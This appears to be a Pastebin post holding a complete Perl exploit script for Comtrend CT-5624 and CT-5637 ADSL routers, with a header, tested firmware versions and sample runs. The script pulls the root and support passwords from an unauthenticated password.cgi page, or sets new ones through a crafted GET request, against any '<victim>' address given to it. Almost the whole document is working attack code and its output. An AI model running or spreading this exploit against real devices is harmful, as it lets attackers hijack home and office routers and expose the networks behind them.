Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
- #
- # Author: Todor Donev
- # Email: todor.donev@@gmail
- # Type: Hardware
- # Vuln Type: Remote
- #
- # Tested:
- # Board ID : CT-5624
- # Software : A011-306TSR-C01_R03
- # Bootloader : 1.0.37-0.7-3
- # ADSL : A2pB022c3.d20e
- #
- # Board ID : CT-5637
- # Software : A111-312BTC-C01_R12
- # Bootloader : 1.0.37-12.1-1
- # ADSL : A2pB023k.d20k_rc2
- #
- #####
- # CT-5624 ADSL2+ Ethernet Router
- # The CT-5624 series ADSL2+ compact and high performance Ethernet router
- # provides four 10/100 Ethernet Interfaces, and one ADSL line interface
- # to access the Internet, incorporating LAN or Video on Demand over one
- # ordinary telephone line, at speeds of up to 24 Mbps. It also has full
- # routing capabilities to segment/route IP protocol, and supports advanced
- # security functions.
- #####
- #
- # playground$ perl comtrend.pl -c 192.168.1.1:80
- # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
- # [!] Target: 192.168.1.1:80
- # [o] New root password: root31337
- # [o] New support password: sup31337
- # [*] Successfully !!
- ##
- # playground$ perl comtrend.pl -d 192.168.1.1:80
- # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
- # [!] Target: 192.168.1.1:80
- # [o] root: root31337
- # [o] support: sup31337
- ##
- # playground$ perl comtrend.pl
- # [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
- # [!] usg: perl comtrend.pl [-c or -d] <victim>
- # [!] -d: Disclosure Root/Support password
- # [!] -c: Change Root/Support password
- #
- #####
- # Thanks to Tsvetelina Emirska
- # for the help and support which gives me =)
- #####
- #
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- use LWP::Simple;
- print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
- if (@ARGV == 0) {&usg;}
- while (@ARGV > 0) {
- $type = shift(@ARGV);
- $t = shift(@ARGV);
- if ($type eq "-d") {
- my $r = get("http://$t/password.cgi") or die("suck!");
- print "[!] Target: $t\n";
- if ($r =~ m/pwdAdmin = '(.*)';/g) {
- $result .= "[o] root: $1\n";
- }
- if ($r =~ m/pwdSupport = '(.*)';/g) {
- $result .= "[o] support: $1\n";
- print $result;
- }}}
- if ($type eq "-c") {
- print "[!] Target: $t\n";
- print "[o] New root password: ";
- my $rootpass=<STDIN>;
- chomp($rootpass);
- print "[o] New support password: ";
- my $suppass=<STDIN>;
- chomp($suppass);
- my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
- if ($r =~ m/pwdAdmin = '$rootpass';/g) {
- print "[*] Successfully !!\n";
- }}
- sub usg(){
- print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
- print "[!] -d: Disclosure Root/Support password\n";
- print "[!] -c: Change Root/Support password\n";
- exit;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement